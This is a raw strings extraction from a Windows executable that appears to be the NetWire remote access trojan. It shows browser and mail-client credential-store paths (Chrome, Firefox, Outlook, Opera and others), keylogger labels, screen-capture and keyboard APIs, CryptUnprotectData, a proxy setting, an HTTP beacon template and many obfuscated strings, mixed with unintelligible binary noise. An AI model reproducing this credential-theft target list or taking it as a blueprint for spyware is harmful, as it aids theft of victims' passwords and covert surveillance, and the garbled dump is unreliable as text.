!This program cannot be run in DOS mode.
P`.data
.eh_fram
0@.bss
.edata
0@.idata
.reloc
T4 C2W
l$,;T$(
D$(;D$|}9
D$,tt1
D$2b/B
D$@b/B
#D$ ;D$
D$(;\$(
D$"x64
D$(t61
D$,t41
9L$Dr@
9D$H~M;|$P}G
L$8<Uu
D$0;D$Pr
D$0;D$Pr
T$4;t$,
L$,9L$ }
|$09|$$
;t$ }3A
D$(9D$`
D$`9D$(s6
D$FBMf
t/;L$
;|$4}6
T$8T$
T$(9T$,
C0;C4s
C0;C4s
C0;C4s
C0;C4s
{0;{4s
K0;K4s
K0;K4s
C0;C4s
K0;K4s
K0;K4s
K0;K4s
S0;S4s
S0;S4s
+C@;C$
S0;S4s
S0;S4s
+S@;S$
C0;C4s
C0;C4s
S0;S4s
S0;S4s
C0;C4s
{0;{4s
C0;C4s
C0;C4s
{0;{4s
S89D$
T$,;T$4
D).9D$ s_
D$,3L$03D$4
9L$@v.
\$09\$(
9L$Pv,
9L$Hv.
\$09\$(
t$L9t$$
td+D$(9
D$<fHy
C(;D$\
L$ 9L$$tl
|$4+|$
9|$@tb
|$4+|$
t$Rf;7
D$,9D$$
D$(9D$ v
u59D$0u/
|$T9D$(v"
T$ +T$
\$(9\$
D$<9D$$
|$4)t$
D$89D$
D$$;D$<
D$89D$ v
T$L)D$
D$h)D$(
t59[Duy
S<9D$h
#D$p#T$t
V<9D$`
L$4)T$
U<9D$<
tD;t$8s
V<9D$8
%s\%s.%s
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
8ccccc/Bcccccccccccccccccccccccccccccccccccccc
%8DmgM
#7@Qhq\1@NWgyxeH\_bpdgc%.2d/%.2d/%d %.2d:%.2d:%.2d
_BqwHaF8TkKDMfOzQASx4VuXdZibUIeylJWhj0m5o2ErLt6vGRN9sY1n3Ppc7g-C%.4d-%.2d-%.2d %.2d:%.2d:%.2d
socks=
.T]l_o)
http://%s%s
%.2d/%.2d/%d %.2d:%.2d:%.2d
%c%.8x%s
%s @ %s
%6\%6.dfd
iphlpapi.dll
psapi.dll
kernel32.dll
Ed5jf5dRSdSqYsqCVid
Ed5jf5dRSdSuSsqCVid
Ed590WYd66XlCnd_4idLCldD
PiW6dS
m465dR4Rn...
MvL MdR5
MvL rdYd42dS
j65CVi46IdS
_4R UC45 (G)
_4R UC45 (h)
PiW6d UC45
PiW64Rn...
mC65 DPH
q4ld UC45
adid5d qPc
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
?456789:;<=
!"#$%&'()*+,-./0123
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
!&.37<
"%/28;=#$019:>?
PTLLjPq %6:%S -qq9/G.y
R-W65: %6:%S
200 OK
mWYCi a46w
%s (%s)
filenames.txt
%s\*.*
U4R-55sTsdR
winhttp.dll
U4R-55sEd590WfZ_W0u0i
U4R-55sEd5Xj90WfZPWR84n_W0PQ00dR5u6d0
MT_qUDrj\F4Y0W6W85\U4RSWg6\PQ00dR5zd064WR\rQR\
MT_qUDrj\F4Y0W6W85\DY542d Md5Qs\XR65CiidS PWlsWRdR56
NETwIRe
SOFTwarE\
HostId
SOFTwarE\NETwIRe
%Rand%
Install Date
-m "%s"
MT_qUDrj\F4Y0W6W85\DY542d Md5Qs\XR65CiidS PWlsWRdR56\%6
M5QV9C5I
GET %s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Connection: close
200 OK
%s%.2d-%.2d-%.4d
[%.2d/%.2d/%d %.2d:%.2d:%.2d]
[cCYw6sCYd]
[jR5d0]
[D00Wg md85]
[D00Wg us]
[D00Wg r4nI5]
[D00Wg aWgR]
[-Wld]
[9Cnd us]
[9Cnd aWgR]
[c0dCw]
[adid5d]
[XR6d05]
[904R5 MY0ddR]
[MY0Wii mWYw]
[PCs6 mWYw]
[Ctrl+%s]
[P50i+%Y]
rdn465d0rCgXRsQ5ad24Yd6
user32.dll
Ed5rCgXRsQ5aC5C
%.2d-%.2d-%.4d
MdYQ0Nh.Sii
m6CEd5mWnWRMd664WRaC5C
m6C_0ddrd5Q0RcQ88d0
m6CjRQld0C5dmWnWRMd664WR6
Default=
MT_qUDrj\FWk4iiC\%6\
PQ00dR5zd064WR
MT_qUDrj\FWk4iiC\%6\%6\FC4R
XR65Cii a40dY5W0Z
lWkQ54i6.Sii
lWkniQd.Sii
lWk67i45dN.Sii
Mozilla Firefox
APPDATA
%6\FWk4iiC\_40d8Wf\s0W84id6.4R4
%6\FWk4iiC\_40d8Wf\%6
Mozilla Thunderbird
%6\qIQRSd0V40S\s0W84id6.4R4
%6\qIQRSd0V40S\%6
SeaMonkey
%6\FWk4iiC\MdCFWRwdZ\s0W84id6.4R4
%6\FWk4iiC\MdCFWRwdZ\%6
%6\64nRWR6.67i45d
%6\iWn4R6.e6WR
NSS_Init
9HGGpEd5XR5d0RCiHdZMiW5
9HGGpDQ5IdR54YC5d
9mpcC6doOadYWSd
MjPXqjFpx80ddX5dl
9HGGMarpadY0Zs5
9HGGp_0ddMiW5
LMMpMIQ5SWgR
67i45dNpWsdR
67i45dNpYiW6d
67i45dNps0dsC0dp2h
67i45dNp65ds
67i45dNpYWiQlRp5df5
6didY5 * 80Wl lWkpiWn4R6
hostname
encryptedUsername
encryptedPassword
IW65RCld
%6\Tsd0C\Tsd0C\gCRS.SC5
%6\Tsd0C\Tsd0C\s0W84id\gCRS.SC5
%6\.sQ0sid\CYYWQR56.fli
<s0W5WYWi>
<RCld>
<sC66gW0S>
9T9N u6d0
9T9N Md02d0
9T9N 9C66gW0S
XFD9 u6d0
XFD9 Md02d0
XFD9 9C66gW0S
-qq9 u6d0
-qq9 Md02d0
-qq9 9C66gW0S
MFq9 u6d0
MFq9 Md02d0
MFq9 9C66gW0S
jDM u6d0
jDM Md02d0 urm
jDM 9C66gW0S
%c%c%S
%c%c%s
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Y0Zs5Nh.Sii
P0Zs5uRs0W5dY5aC5C
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
%s\*.*
4RSdf.SC5
2CQi5Yi4.Sii
zCQi5TsdRzCQi5
zCQi5PiW6dzCQi5
zCQi5jRQld0C5dX5dl6
zCQi5Ed5X5dl
zCQi5_0dd
History
Software\MIcRoSoft\Windows\CurrentVersion\Explorer\Shell FoLders
0x%02hhX
enCRypTed_Key
LOCaLApPDaTA
%6\EWWNid\Pi0wld\u6d0 aC5C\ad8CQi5\MWN4R ac5c
%s\Google\ChRoMe\User DatA\Default\Login Data
%s\Google\Chrome\User Data\Local State
%6\PI0Wl4Ql\u6d0 aC5C\ad8CQi5\mWn4R aC5C
%s\Chromium\User Data\Default\Login Data
%s\Chromium\User Data\Local State
%6\PWlWSW\a0CnWR\u6d0 aC5C\ad8CQi5\mWn4R aC5C
%s\Comodo\Dragon\User Data\Default\Login Data
%s\Comodo\Dragon\User Data\Local State
%6\vCRSdf\vCRSdfc0Wg6d0\u6d0 aC5C\ad8CQi5\mWn4R aC5C
%s\Yandex\YandexBrowser\User Data\Default\Login Data
%s\Yandex\YandexBrowser\User Data\Local State
%s\BraveSoftware\Brave-Browser\User Data\Default\Login Data
%s\BraveSoftware\Brave-Browser\User Data\Local State
%s\360Chrome\Chrome\User Data\Default\Login Data
Chrome\Chrome\User Data\Default\Login Data
%s\360Chrome\Chrome\User Data\Local State
%6\Tsd0C MW85gC0d\Tsd0C M5CVid\mWn4R aC5C
l62Y0Gyy.Sii
l62YsGyy.Sii
l62Y0Ghy.Sii
l62YsGhy.Sii
Cs43l63g4R3YW0d354ldkWRd3iG3G3y.Sii
Cs43l63g4R3YW0d384id3iG3G3y.Sii
Cs43l63g4R3YW0d384id3ih3G3y.Sii
Cs43l63g4R3YW0d3iWYCi4kC54WR3iG3h3y.Sii
Cs43l63g4R3YW0d36ZRYI3iG3h3y.Sii
Cs43l63g4R3YW0d3s0WYd665I0dCS63iG3G3G.Sii
Cs43l63g4R3YW0d384id3iG3h3y.Sii
Cs43l63g4R3Y0530QR54ld3iG3G3y.Sii
Cs43l63g4R3Y0536504Rn3iG3G3y.Sii
Cs43l63g4R3Y053IdCs3iG3G3y.Sii
Cs43l63g4R3Y05365S4W3iG3G3y.Sii
Cs43l63g4R3Y053YWR2d053iG3G3y.Sii
Cs43l63g4R3Y053iWYCid3iG3G3y.Sii
Cs43l63g4R3Y053lC5I3iG3G3y.Sii
Cs43l63g4R3Y053lQi54VZ5d3iG3G3y.Sii
Cs43l63g4R3Y05354ld3iG3G3y.Sii
Cs43l63g4R3Y05384id6Z65dl3iG3G3y.Sii
Cs43l63g4R3Y053dR240WRldR53iG3G3y.Sii
Cs43l63g4R3Y053Q54i45Z3iG3G3y.Sii
Cs43l63g4R3YW0d36504Rn3iG3G3y.Sii
Cs43l63g4R3YW0d3RCldSs4sd3iG3G3y.Sii
Cs43l63g4R3YW0d3ICRSid3iG3G3y.Sii
Cs43l63g4R3YW0d3IdCs3iG3G3y.Sii
Cs43l63g4R3YW0d3i4V0C0ZiWCSd03iG3G3y.Sii
Cs43l63g4R3YW0d36ZRYI3iG3G3y.Sii
Cs43l63g4R3YW0d3s0WYd665I0dCS63iG3G3y.Sii
Cs43l63g4R3YW0d3s0WYd66dR240WRldR53iG3G3y.Sii
Cs43l63g4R3YW0d3SC5d54ld3iG3G3y.Sii
Cs43l63g4R3YW0d36Z64R8W3iG3G3y.Sii
Cs43l63g4R3YW0d3YWR6Wid3iG3G3y.Sii
Cs43l63g4R3YW0d3SdVQn3iG3G3y.Sii
Cs43l63g4R3YW0d3s0W84id3iG3G3y.Sii
Cs43l63g4R3YW0d3ldlW0Z3iG3G3y.Sii
Cs43l63g4R3YW0d3Q54i3iG3G3y.Sii
Cs43l63g4R3YW0d305i6QssW053iG3G3y.Sii
Cs43l63g4R3YW0d34R5d0iWYwdS3iG3G3y.Sii
QY05VC6d.Sii
2Y0QR54ldGOy.Sii
l62YsGOy.Sii
lWkY05Gt.Sii
67i45dN.Sii
R6s0O.Sii
siYO.Sii
siS6O.Sii
R66Q54iN.Sii
R66N.Sii
6W85WwRN.Sii
R66SVlN.Sii
Ed5FWSQid_4idLCldjfD
psapi.dll
kernel32.dll
%.2d/%.2d/%d %.2d:%.2d:%.2d
0x%.8X (%d)
0x%.16llX (%I64d)
%c%.8x%s
%c%.8x%s%s
%c%.8x%s\%s
%c%.8x%s\%s
ComSpec
WINDIR
%6\6Z65dlNh\YlS.dfd
localhost
Unknown
Ed5LC542dMZ65dlXR8W
wd0RdiNh.Sii
EiWVCiFdlW0ZM5C5Q6jf
kernel32.dll
-DraUDrj\ajMPrX9qXTL\MZ65dl\PdR50Ci90WYd66W0\y
ProcessorNameString
DiiWYC5dDRSXR454Ci4kdM4S
advapi32.dll
PIdYwqWwdRFdlVd06I4s
_0ddM4S
WINDIR
%d:%s%s;
%d:%I64u:%s%s;
%c%llu
bits <= ((1U << len) - 1U)
code < TDEFL_MAX_HUFF_SYMBOLS_2
d->m_huff_code_sizes[0][s_tdefl_len_sym[match_len]]
d->m_huff_code_sizes[0][lit]
!d->m_output_flush_remaining
d->m_pOutput_buf < d->m_pOutput_buf_end
pArray->m_element_size
9.1.15
(cur_match_len >= TDEFL_MIN_MATCH_LEN) && (cur_match_dist >= 1) && (cur_match_dist <= TDEFL_LZ_DICT_SIZE)
lookahead_size >= cur_match_len
max_match_len <= TDEFL_MAX_MATCH_LEN
(match_len >= TDEFL_MIN_MATCH_LEN) && (match_dist >= 1) && (match_dist <= TDEFL_LZ_DICT_SIZE)
d->m_lookahead_size >= len_to_move
d->m_pPut_buf_func
(local_dir_header_ofs & (pZip->m_file_offset_alignment - 1)) == 0
(zip->entry.header_offset & (pzip->m_file_offset_alignment - 1)) == 0
stream end
need dictionary
file error
stream error
data error
out of memory
buf error
version error
parameter error
../nettle-3.5.1/aes-encrypt.c
!(length % AES_BLOCK_SIZE)
L&&jl66Z~??A
Oh44\Q
sb11S*
uB!!c
D""fT**~;
;d22Vt::N
J%%o\..r8
gg}V++
jL&&Zl66A~??
Sb11?*
tX,,.4
RRMv;;a
MMUf33
PPDx<<
cB!!0
~~Gz==
fD""~T**
Vd22Nt::
xxoJ%%r\..$8
tt!>
ppB|>>
aa_j55
UUxP((z
&jL&6Zl6?A~?
~=Gz=d
"fD"*~T*
2Vd2:Nt:
x%oJ%.r\.
t!>K
a5_j5W
=&&jL66Zl??A~
g99KrJJ
==Gzdd
""fD**~T
22Vd::Nt
$$lH\\
77Ynmm
%%oJ..r\
!>KK
55_jWW
:,../nettle-3.5.1/gcm.c
ctx->auth_size % GCM_BLOCK_SIZE == 0
ctx->data_size == 0
ctx->data_size % GCM_BLOCK_SIZE == 0
length <= GCM_BLOCK_SIZE
../nettle-3.5.1/memxor.c
n == 1
../nettle-3.5.1/memxor3.c
n == 1
../nettle-3.5.1/aes-set-key-internal.c
nk != 0
../nettle-3.5.1/ctr16.c
length < 16
length - i < CTR_BUFFER_LIMIT
GCC: (Rev3, Built by MSYS2 project) 9.1.0
GCC: (Rev3, Built by MSYS2 project) 9.1.0
GCC: (Rev3, Built by MSYS2 project) 9.1.0
GCC: (Rev3, Built by MSYS2 project) 9.1.0
GCC: (Rev3, Built by MSYS2 project) 9.1.0
GCC: (Rev3, Built by MSYS2 project) 9.1.0
GCC: (Rev3, Built by MSYS2 project) 9.1.0
GCC: (Rev3, Built by MSYS2 project) 9.1.0
GCC: (Rev3, Built by MSYS2 project) 9.1.0
Host.exe
CryptAcquireContextA
CryptCreateHash
CryptDestroyHash
CryptGetHashParam
CryptHashData
CryptReleaseContext
GetUserNameW
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
RegEnumKeyExA
RegEnumValueA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
CryptUnprotectData
BitBlt
CreateCompatibleBitmap
CreateCompatibleDC
DeleteDC
DeleteObject
GetDIBits
SelectObject
CloseHandle
CreateDirectoryW
CreateFileW
CreateMutexA
CreatePipe
CreateProcessA
CreateToolhelp32Snapshot
DeleteFileW
EnterCriticalSection
ExitProcess
FileTimeToSystemTime
FindClose
FindFirstFileA
FindFirstFileW
FindNextFileA
FindNextFileW
FreeLibrary
GetCommandLineA
GetComputerNameW
GetCurrentProcessId
GetCurrentThreadId
GetDiskFreeSpaceExA
GetDriveTypeA
GetFileAttributesExW
GetFileAttributesW
GetLastError
GetLocalTime
GetLogicalDriveStringsA
GetModuleFileNameW
GetProcAddress
GetProcessTimes
GetStartupInfoA
GetSystemInfo
GetSystemTime
GetTickCount
GetVersionExA
GetVolumeInformationA
InitializeCriticalSection
LeaveCriticalSection
LoadLibraryA
LocalFree
MoveFileW
MultiByteToWideChar
OpenProcess
PeekNamedPipe
Process32First
Process32Next
ReadFile
ReleaseMutex
ResumeThread
SetErrorMode
SetFileAttributesW
SetFilePointer
TerminateProcess
WideCharToMultiByte
WriteFile
_assert
_beginthreadex
_errno
_filelengthi64
_mkdir
_snwprintf
_vscprintf
_vsnprintf
_wfopen
calloc
fclose
fflush
fgetpos
freopen
fsetpos
fwprintf
fwrite
getenv
localtime
malloc
memcmp
mktime
realloc
remove
sprintf
strcat
strchr
strcmp
strcpy
strncpy
wcscat
NetApiBufferFree
NetWkstaGetInfo
SHFileOperationW
ShellExecuteA
ShellExecuteW
CreateWindowExW
DefWindowProcW
DispatchMessageA
EnumWindows
GetDesktopWindow
GetForegroundWindow
GetKeyNameTextW
GetKeyState
GetKeyboardState
GetLastInputInfo
GetMessageW
GetSystemMetrics
GetWindowTextW
IsWindowVisible
MapVirtualKeyW
PostQuitMessage
RegisterClassExW
ReleaseDC
SendMessageA
SendMessageW
SetCursorPos
SetWindowTextW
ShowWindow
ToUnicode
TranslateMessage
keybd_event
mouse_event
WSACleanup
WSAGetLastError
WSAIoctl
WSAStartup
__WSAFDIsSet
closesocket
connect
gethostbyname
inet_ntoa
ioctlsocket
select
setsockopt
shutdown
socket
ADVAPI32.DLL
CRYPT32.DLL
GDI32.dll
KERNEL32.dll
msvcrt.dll
NETAPI32.DLL
SHELL32.DLL
USER32.dll
WS2_32.dll
0 0+010;0E0
2%313|3
4[4S5.6
5P6\6l6|6
?(?0?7?>?P?[?b?i?
1%1;1E1[1b1v1
2+252K2R2d2n2}2
3#353u3
424m4w4
646;6V6`6p6w6
7%7?7I7P7[7k7y7
8,8D8R8n8
0)0M0f0
2&2-282A2H2U2\2i2r2y2
444A4M4d4q4~4
9W9^9e9q9x9
:7:J:P:f:r:w:}:
; ;\;d;~;
;><K<R<W<c<j<q<%=4=C=
> >1>@>O>^>m>|>
?4?9?Y?f?
1-151=1D1d1
;';@;H;M;Z;
><>C>_>y>
9c:G;b;
3&6.7g7
3*464U4a4
6*616?6
72888N8U8f8
9959<9
:::G:l:
;1;L;d;|;
<$<<<T<
=(=X=^=i=
=3>9>Y>l>
?6?>?c?
102=2c2
7@7[7c7r7w7
<V=c=r=
=2>j>}>
3#3Z3b3q3
4L4S4h4}4
5,5F5f5
7#787[7n7
78R8m8
8/8C8m;J<
+0?0S0&222
8#?/?O?[?
2 212N2[2k2|2
2`243@3
5%6?6M6g6u6
9 :A:W:|:
112[2$4
878>8|8
.858a8
9"9t={=
4&4.464>4F4N4V4^4f4n4v4~4
5&5.565>5F5N5V5^5f5n5v5~5
6&6.666>6F6N6V6^6f6n6v6~6
7&7.767>7F7N7V7^7f7n7v7~7
8&8.868>8F8N8V8^8f8n8v8~8
9&9.969>9F9N9V9^9f9n9v9
;N;U;[;
;.<5<;<
2!2'2?2F2L2
2:3g3n3t3
4L5S5Y5
6E8L8R8
/2K2U2g2q2
3!5(5.5F5M5S5
9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;
d=h=l=p=t=x=|=
4L4P4T4X4\4`4T7X7\7`7d7h7l7p7t7x7|7
8 8$8(8D=L=T=\=d=l=t=|=
InternetProxy
http://www.yandex.com
ssdaClass